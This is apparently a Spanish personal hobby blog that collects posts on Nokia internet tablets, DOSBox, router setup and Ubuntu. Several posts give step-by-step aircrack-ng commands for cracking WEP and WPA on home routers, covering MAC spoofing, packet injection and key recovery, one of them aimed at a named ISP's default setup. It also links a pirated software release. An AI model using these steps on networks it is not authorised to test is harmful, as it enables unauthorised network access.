Crack WPA desde nokia n800

Hola, antes de recibir comentarios diciendo que no se notan los comandos o que el video es de mala calidad, aclaro que no es un tutorial solo es con fines demostrativos, he estado jugando ultimamente con mi nokia y con una tarjeta usb (rt73), pero aun no puedo hacer que inyecte, sigo haciendo pruebas, lo mas que he logrado es capturar el handshake y pasarle aircrack con un diccionario de palabras.

Espero pronto subir ya un video donde este inyectando con el nokia =P.

salu2
kyokorn

Crack wep con acer one series desde memoria USB

Cuanto adquirí esta laptop no estaba muy convencido puesto que me habían dicho que era un poco lenta, pero la verdad después de poco menos de 2 meses de usarla puedo decir que es una excelente maquina funciona de maravilla tanto con win$ como con linux (ubuntu 8.10) y por si fuera poco funciona excelente mente bien con backtrack 4 beta, este tuto es para crackear wep con la acer one booteando desde una memoria USB (de mínimo 1 GB).

Bueno empecemos, primero el material requerido:

• Laptop Acer one (Obvio)
• Archivo iso de la pagina de backtrack. Pagina de descarga de Backtrack
• Memoria de mínimo 1 GB.
• Programa unetboot. Pagina oficial de Unetboot
• Una coca cola pa la calor.

Manos a la obra, primero abrimos el programa de unetboot puede ser desde windows y configuramos lo siguiente (Marcados en azul):

- Distribución: Ubuntu 8.10_live
- Imagen: ISO - C:\bt4-beta.iso (O donde tengan guardada la imagen iso)
- Tipo: Unidad USB – Unidad: E: (Esta es la unidad de su memoria USB)

Y listo empezara el programa a copiar los datos necesarios y al final tendremos nuestra memoria USB booteable lista para arrancar:

Damos enter y comenzara a cargar backtrack, despues de terminar de cargar nos pedira login y password:

Login: root
Password: toor

Y luego tecleamos startx para iniciar el modo grafico:

Y dentro del entorno grafico abrimos una terminal de comandos, y tecleamos iwconfig vemos que nos reconoce la tarjeta wireless pero al dar iwconfig ath0 mode monitor para ponerla en modo monitor nos da un error:

Para poder ponerla en modo monitor tecleamos lo siguiente:

wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor nosbeacon

Y vemos que al teclear iwconfig ya esta en modo monitor:

Aprovechamos y de una ves cambiamos la mac de la tarjeta:

Ahora ya podemos empezar a escanear redes y poder auditar nuestro AP:

Primero tecleamos airodump-ng para obtener los datos del AP que estamos auditando en mi caso y como ejemplo auditare mi AP llamado 2WIRE1, entonces el comando para poder escanear solamente mi AP seria:

donde:

-w kyokorn–> indica que en al archivo kyokorn se guardaran los datos capturados
-c 6 –> Indica que escanee solamente en el canal 6.
--bssid 00:14:xx:xx:xx:xx –> indica la MAC de mi AP que estoy auditando.

Al teclear el comando obtendremos lo siguiente:

Marcado en azul vemos la flechita para dar click y abrir un par mas de terminales (Shell N. 2 y Shell N.3) que usaremos para continuar.

En la Shell 2. Tecleamos:

Y vemos la carita feliz :-) que indica que nos hemos asociado correctamente al AP.

Ahora en ese mismo shell 2. tecleamos lo siguiente:

Damos enter, y vemos como empieza a inyectar, nos cambiamos a la pestaña Shell para volver a la pantalla donde dejamos corriendo airodump-ng:

Podemos ver marcado en verde la velocidad de inyeccion 389 ivs/seg, muy buenos :O

Ahora ya solo en la Shell 3. corremos el comando para aircrack:

aircrack-ng –x kyokorn-01.cap

Damos enter, y vemos que con poco mas de 40,000 iv’s obtenemos la clave wep.

Y listo el precio bajo de esta laptop vale cada centavo es una buena maquina con buen disco duro y soporta perfectamente ubuntu, backtrack, windows xp etc.

Dejo otra captura del escitorio de ubuntu corriendo igual la suite de aircrack.

Y otra mas de mis juguetes por orden de estatura: nokia n800 (Linux maemo Diablo), Acer One con ubuntu 8.10, y ibook G3 con Mac Os X 10.3.

Nota: Se que muchos van a decir que tambien hay una version usb de backtrack, sin embargo yo elegi este metodo ya que habia descargado y ya tenia el iso de backtrack.

También se borraron las MAC'S de los AP's que salieron durante el escaneo para evitar ofender la sensibilidad de alguién o que se llegue a mal interpretar.

Happy Hack !
Salu2
kyokorn

DosBox en nokia n800 - Windows 3.1 - Juegos

Pues es increible lo que avanza la tecnologia, quien iba a decir que se iba poder emular en la palma de tu mano una computadora(286 mi primer computadora) que en su momento pesaba lo que pesa mi hija de 2 años.

Hace un rato que estuve haciendo pruebas me lleno de nostalgia el ver de nuevo el windows 3.1, el Wolfenstein3D, el prince of persia, wow quede maravillado y lleno de nostalgia ñ_ñ, ya que fueron de los primeros juegos que corri en mi poderosa 286 con ms-dos porque al principio solo use msdos posteriormente ya que tuve una 386 use windows 3.1.

Bueno explicare un poco como se instala dosBox en el poderoso nokia n800, tambien vi que ya hay una version para symbian de hecho lo vi corriendo en un nokia n95.

Pues lo primero es instalar DosBox, esto no tiene mayor problema solo bajan el archivo segun su S.O (en mi caso Maemo Diablo os2008)

http://pupnik.de/dosbox.html

Ahora despues de esto yo lo que hice fue crear una carpeta en una de mis memorias sd llamada C ahi guarde todos los archivos que quiero correr desde el DosBox, meti la carpeta de instalacion de windows 3.1, el principe de persia y la carpeta del wolf3d.

Bueno ya con todo listo en la tarjeta corremos el DosBox

Ya en la linea de comandos escribimos:

z:\>mount c /media/mmc2/c

(Nota: /media/mmc2/c esta es la ruta de mi carpeta C que cree previamente en mi tarjeta de memoria)

z:\>c:

c:\>

Y ya con esto tendremos montado nuestra unidad C en el DosBox, y ya podemos instalar windows 3.1 o windows 95 o lo que te venga en gana que corra desde el viejo ms-dos.

De aqui pueden bajar un sin fin de juegos de ms-dos, yo baje de aqui el prince of persia y el wolfestein3d y los dos como pueden ver corren perfectamente bien.

http://www.dosgamesarchive.com/list/

Y bueno un punto bastante favorable es que en el nokia n800 se le puede conectar un teclado usb, asi puedes jugar comodamente wolfestein o prince of persia :D

Salu2

kyokorn

COMO CONECTAR TECLADO USB A NOKIA 770 CON CAJITA "POWER INJECTOR USB"

Hola.

Recien hace una semana adquiri este fabuloso aparato, pero siempre he odiado los teclados virtuales es una lata estar escribiendo, asi que me puse a investigar y me di cuenta que se puede poner en modo host para conectar dispositivos USB.

Por ahi en un blog vi un circuito algo casero, y decidi a mejorarlo cambiando los conectores y usando materiales y conectores que yo mismo construí o adapte, este es el circuito, gracias al amigo Moe por la corrección de la resistencia en el LED :P :

Los materiales son muy baratos la bateria es de las cuadradas de 9V.

Pero aqui pongo la lista completa de materiales:

* Bateria 9V

* Capacitor 100uF

* Capacitor 2.2uF

* Capacitor 100nF

* Led Verde

* Resistencia 330 OHMS

* Regulador 5V LM7805

* Diodo 1N4004

* 1 Switch

* 2 Conectores Hembra para chasis RCA.

* 2 Conectores Macho RCA

* 1 Chocolates de "Cafe Punta del Cielo" (Por la caja metalica)

Bueno en si los pasos son sencillos para alguien que sabe soldar, aqui pongo el circuito impreso, junto con el programa que pueden ocupar para rediseñar el circuito si lo quieren hacer mas pequeño o agregar mas cosas. Yo lo hice asi por comodidad y diseño para que cupiera dentro de la caja y poderlo fijar a la misma. Dentro del rar vienen los archivos .pcb del circuito impreso y .ms10 del circuito en Multisim.

http://rapidshare.com/files/149417105/PCB_Wizard_3.50_Pro_Unlimited__CubituZ_Release_.rar.html

Aqui pongo unas fotos para que se den idea de como va montado el circuito.

Este es el esquema de como se conectaria el teclado USB al nokia, utilizando un hub usb para eso es esta cajita para alimentar el hub y poder conectar ahi el teclado

Aqui se ve la caja, solo con el interruptor montado y el circuito afuera.

Puse cinta de aislar a la caja en la parte donde voy a poner el circuito para evitar cortos circuitos

Aqui se puede ver como puse los dos conectores RCA tipo chasis a la caja de metal

Aqui se ve ya todo completo el montaje y funcionando


Otra foto mas de cerca del circuito montado


El Hub alimentado y conectado al nokia y y a un teclado USB


Testeando presionando las teclas


Aqui esta el cable que uso del HUB al Power inyector


Aqui se puede ver como queda energizado para usar nuestro teclado USB :D.

*** UPDATE ***

Agregue estas estampas

Agregue belcro a la bateria para que no se mueva

Este aparato es verdaderamente potente, tomando en cuenta que esta tecnologia es vieja aprox 3 años ya hay un nuevo modelo en nokia n800 y n810, Dentro de las aplicaciones que le he instalado son:

* Firmware: Internet Tablet OS 2007 Hacker Edition for the 770
Version: 4.2008.7-1
* Suite aircrack-ng 9.1
* Aircrack-ptw
* MH Shot tool
* Netcat
* Nmap
* Dsniff
* Kismet
* Gaim
* X terminal
* VNC Viewer
* Google Talk (Llamadas VozIP)
* Doom
* Skype

Dejo una captura de pantalla del nokia (La captura es desde el nokia usando MH Shot tool).

Notas Finales:

Abajo cito los links en los que me base, a diferencia de thoughtfix use conectores RCA en lugar de USB, en primera por comodidad y en segunda porque no encontre xD, pero ustedes pueden usar cualquier conector, El conector USB Hembra-Hembra yo lo costrui tambien, usando un apatador de teclado de PS2 a USB u un cable extensor de USB, abajo pongo el diagrama de como van los cables al convertidor ps2/usb, ya que comprarlo se me hizo muy cara el conector 100 pesos :S,

Tambien dejo un video estrenando la utilidad de blogger.

Nuevo video.

Salu2

kyokorn

Fuente: http://tabletblog.com/2006/01/usb-power-injector-2.html

Fuente: http://www.todosymbian.com/postx24871-0-15.html

NUEVOS VIDEOS A PANTALLA COMPLETA

Hola dejo estos videos que hice en wink a pantalla completa, todos son usando wifislax :

http://kyokorn.webcindario.com/wifi/airo8187.htm <-- Tarjeta usb 8187 y airoscript
http://kyokorn.webcindario.com/wifi/wifislax.htm <-- Tarjeta usb 8187
http://kyokorn.webcindario.com/wifi/ipw2200.htm <-- Tarjeta intel ipw2200

Salu2
kyokorn

COMANDOS SUITE AIRCRACK-NG USANDO WIFISLAX Y TARJETA RALINK 8187

Primero ponemos la tarjeta en modo monitor y cambiamos la MAC de nuestra tarjeta: (Abrimos 3 terminales, ver detalle en video citado abajo)

Terminal 1

iwconfig wlan0 mode monitor
macchanger -m 00:11:22:33:44:55 wlan0

Arrancar snifer:

airodump-ng wlan0

Solo para tener los datos del AP a auditar, paramos el escaneo con Ctrl+c

Ejemplo:

Supongamos que el AP que vamos a auditar es INFINITUM0666 COPIAMOS EL BSSID DE INFINITUM0666 (Mac address) por ejemplo: 00:1F:38:45:56:91, ya tenemos todos los tados para lanzar el ataque 1 y 3 de aireplay-ng

Terminal 1

airodump-ng -c 6 -w kyokorn wlan0

Terminal 2

aireplay-ng -1 0 -e INFINITUM0666 -a 00:1F:38:45:56:91 -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b 00:1F:38:45:56:91 -h 00:11:22:33:44:55 wlan0

y por ultimo pasamos aircrack en el archivo de captura en mi caso kyokorn (airodump les pone terminacion 01 02 03 etc etc a los archivos de captura):

Entonces quedaria:

Terminal 3

aircrack-ptw kyokorn-01.cap
aircrack-ng -x kyokorn-01.cap (Comando equivalente, usar el de arriba o este)

Nota: obviamente trabajando en el mismo directorio y trabajando en 3 terminales (Separadas en colores)

Estos comandos con usandos en el videotutorial:

http://kyokorn.webcindario.com/wifi/wifislax.htm

Salu2
kyokorn

Crackeando WPA/WPA2 usando ubuntu 7.10 y un router de Telmex

Crackeando WPA usando ubuntu 7.10, router telmex, mi tarjeta es una wistrom con chipset atheros, la cancion del video la estuve buscando mucho tiempo me recuerda a mis tiempos que soñaba con una pc para jugar fifa 2000 jaja escucho la cancion y se me enchina la piel eran chidas esas epocas del 2000.

Dejo info para los que siempre preguntan de donde descargar aircrack-ng, backtrack, etc etc...

Aircrack: http://www.aircrack-ng.org/doku.php?id=aircrack-ng.es
aircrack-ptw: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Ubuntu: http://www.ubuntu-es.org/
BackTrack: http://www.remote-exploit.org/backtrack_download.html
Wifi-Slax: http://www.wifislax.com/

Crackear WEP usando wifislax 3.1 y airoscript

Hola, este video es crackeando WEP usando wifislax 3.1 y airoscript.

Visten la pagina del buen hwagm (Creador de wifislax)
http://www.seguridadwireless.net
Saludos
kyokorn

Configurar un WRT54G en modo cliente paracompartir internet conectandose a otro AP:)

Que tal, pues este router lo compre hace ya mucho lo vendi y despues regreso a mi, es una version 2.2. y debo decir que es un router excelente. Le cambie el firmware oficial por el dd-wrt (Mas info aqui) y mas que nada lo que queria es tener un AP en modo cliente para conectarme con otro AP y asi tener internet en otras maquinas:

AP -----------------> AP modo cliente -----------------------------> Mi laptop
2wire __________(WRT54G) ____________________________Mi Pc escritorio .........etc etc
infinitum


Es decir ocupar las salidas ethernet del router para poder conectar mas maquinas gracias al modo cliente. bueno vamos a la practica:

1.- Antes que nada reseteamos el router (Conectar a la corriente y dejar presionado el boton reset por unos 30 segundo).

2.- Accedemos al router por medio de la interfaz web por default: http://192.168.1.1.


3.- Nos dirigimos hacia Setup-Basic luego la pestaña setup y cambiamos los siguientes valores:

===> en el campo Network Setup, ponemos la ip: 192.168.2.1
===> DHCP server lo desactivamos.
===> Activamos la opcion que dice Assing WAN port to switch (Marcada en rojo).
===> Damos click en el boton save settings.


4. Volvemos a acceder a la configuracion del router recordemos que le cambiamos la IP asi que entramos en la nueva: http://192.168.2.1.

5. Nos vamos a Wireless despues Basic settings y configuramos lo siguiente:
===> Wireless Mode: Client.
===> Wireless Network Name (SSID): Inalambrica (Aqui ponemos el nombre del AP en mi caso 2WIREXXX)
===> Damos click en el botton de save settings.



6. Ahora nos vamos a Wireless despues -> Security y configuramos lo siguiente:
===> Security Mode: WEP
===> Encryption: 64 bits (o la que ustedes prefieran)
===> Key 1: xxxxxxxxxx Ponemos la clave en hexa sin ningun tipo de separadores.
===> Damos click en el botton de save settings.

7. Ahora vamos a Status y observamos que ya estamos conectados, en la parte de superior derecha vemos que el router se conecta al AP, y el DHCP del AP le asignara una ip al router. esta ip aparece en la web del router como: WAN IP :)


Vemos que el AP nos asigna una direccion IP por dchp

Ya solo faltaria configurar cada maquina con una IP fija en el rango siguiente:

IP ->192.168.2.X,

por ejemplo la 192.168.2.21, y de puerta de enlace (GTW) nos ponemos la 192.168.2.1. Funciona como router, cualquier otro equipo en la misma subred y con el gtw 192.168.2.1. tambien podra navegar por la internet.

Espero haya sido de ayuda esta configuración, Nos vemos

Salu2
kyokorn

Cracker infinitum 2wire en menos de 2 miutos

Con la salida de Aircrack-tpw http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw, es posible cracker WEP con muchos menos Iv's, en el video se muestra como con tan solo 16,000 Iv's se rompre la clave WEP de la configuracion tipica de infinitum.

Es necesario instalar la suite de aircrack http://www.aircrack-ng.org, asi como tener la tarjeta en modo monitor, una guia muy buena de como poner en modo monitor su tarjeta la pueden encontrar en: http://hwagm.elhacker.net/drivers-ng/driver-ng.htm, despues de tener todo esto listo proceden a compilar aircrack-ptw deben tener el paquete libpcap0.8-dev si son usuarios de ubuntu pueden instalarlo tecleando: apt-get install libpcap0.8-dev desde la terminal de comandos.

Salu2
kyokorn

Aspectos importantes para los nuevos usuarios de Ubuntu

Que tal, pues no tiene mucho que instalé ubuntu y la verdad es que quede maravillado, ya que puedo decir que ya no dependo de windows jaja poco a poco lo estoy dejando, hasta el momento he podido instalar y configurar todo lo que se me ha ocurrido que normalmente hago con windows empezando por instalar correctamente los players y codecs para ver peliculas con subtitulos y todo, a decir verdad no es gran ciencia hacer esto pero para los que no tienen mucha experiencia si es algo que no tan facil se encuentra o que se encuentra pero muy enrrollado,

Lo primero que se hace para poder instalar software con copyright es abrir el gestor de paquetes de synaptic y en el menu configuracion irse a repositorios ahi hay que activar la casilla de Software restringido por copyright o cuestiones legales

Ya con esta opcion vamos a poder instalar, mi reproductor favorito de peliculas en totem o bien puede ser tambien mplayer, estos los podemos instalar desde el gestor de paquetes synaptic le damos buscar y listo, solo que aqui es donde entramos en los primeros obstaculos ya que si en efecto el reproductor se instala correctamente lo que no se instalan son los codecs, el reproductos que si instala algunos codecs es VLC pero este reproductor me dio problemas con los subtitulos se saltaba muchos subtitulos por lo cual mejor busque la manera de instalar los codecs manualmente, lo que hice en este caso para no quebrarme tanto la cabeza fue instalar automatix.


http://www.getautomatix.com

En la imagen se ve la opcion que debemos activar para instalarla, Multimedia Codecs para poder reproducir los videos con el Totem o con Mplayer o su reproductor favorito.

Como reproductor de mp3's recomiendo Amarok, lo pueden instalar en el gestor de paquetes Synaptic.

Pues hasta aqui el problema con los codecs y los reproductores de video y audio.


Lo siguiente que hice fue instalar correctamente los drivers para modo monitor de mi tarjeta, dejo una captura por el momento, queda pendiente esta parte ..

Salu2
kyokorn